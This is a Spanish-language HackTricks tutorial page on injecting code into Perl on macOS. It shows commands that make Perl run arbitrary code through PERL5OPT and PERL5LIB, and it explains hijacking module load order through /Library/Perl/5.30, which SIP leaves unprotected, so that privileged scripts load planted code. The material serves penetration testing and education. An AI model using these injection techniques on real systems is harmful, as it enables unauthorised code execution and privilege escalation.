mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-25 11:25:13 +00:00
90 lines
5.4 KiB
Markdown
90 lines
5.4 KiB
Markdown
|
# Inyección de Aplicaciones Perl en macOS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## A través de las variables de entorno `PERL5OPT` y `PERL5LIB`
|
||
|
|
||
|
Usando la variable de entorno PERL5OPT es posible hacer que perl ejecute comandos arbitrarios.\
|
||
|
Por ejemplo, crea este script:
|
||
|
|
||
|
{% code title="test.pl" %}
|
||
|
```perl
|
||
|
#!/usr/bin/perl
|
||
|
print "Hello from the Perl script!\n";
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Ahora **exporta la variable de entorno** y ejecuta el script **perl**:
|
||
|
```bash
|
||
|
export PERL5OPT='-Mwarnings;system("whoami")'
|
||
|
perl test.pl # This will execute "whoami"
|
||
|
```
|
||
|
Otra opción es crear un módulo Perl (por ejemplo, `/tmp/pmod.pm`):
|
||
|
|
||
|
{% code title="/tmp/pmod.pm" %}
|
||
|
```perl
|
||
|
#!/usr/bin/perl
|
||
|
package pmod;
|
||
|
system('whoami');
|
||
|
1; # Modules must return a true value
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Y luego utiliza las variables de entorno:
|
||
|
```bash
|
||
|
PERL5LIB=/tmp/ PERL5OPT=-Mpmod
|
||
|
```
|
||
|
## A través de dependencias
|
||
|
|
||
|
Es posible listar el orden de las carpetas de dependencias de Perl en ejecución:
|
||
|
```bash
|
||
|
perl -e 'print join("\n", @INC)'
|
||
|
```
|
||
|
Lo cual devolverá algo como:
|
||
|
```bash
|
||
|
/Library/Perl/5.30/darwin-thread-multi-2level
|
||
|
/Library/Perl/5.30
|
||
|
/Network/Library/Perl/5.30/darwin-thread-multi-2level
|
||
|
/Network/Library/Perl/5.30
|
||
|
/Library/Perl/Updates/5.30.3
|
||
|
/System/Library/Perl/5.30/darwin-thread-multi-2level
|
||
|
/System/Library/Perl/5.30
|
||
|
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
|
||
|
/System/Library/Perl/Extras/5.30
|
||
|
```
|
||
|
Algunas de las carpetas devueltas ni siquiera existen, sin embargo, **`/Library/Perl/5.30`** sí **existe**, no está **protegida** por **SIP** y está **antes** de las carpetas **protegidas por SIP**. Por lo tanto, alguien podría abusar de esa carpeta para agregar dependencias de scripts y hacer que un script Perl de alto privilegio las cargue.
|
||
|
|
||
|
{% hint style="warning" %}
|
||
|
Sin embargo, ten en cuenta que **necesitas ser root para escribir en esa carpeta** y hoy en día obtendrás esta **solicitud de TCC**:
|
||
|
{% endhint %}
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1).png" alt="" width="244"><figcaption></figcaption></figure>
|
||
|
|
||
|
Por ejemplo, si un script está importando **`use File::Basename;`**, sería posible crear `/Library/Perl/5.30/File/Basename.pm` para ejecutar código arbitrario.
|
||
|
|
||
|
## Referencias
|
||
|
|
||
|
* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|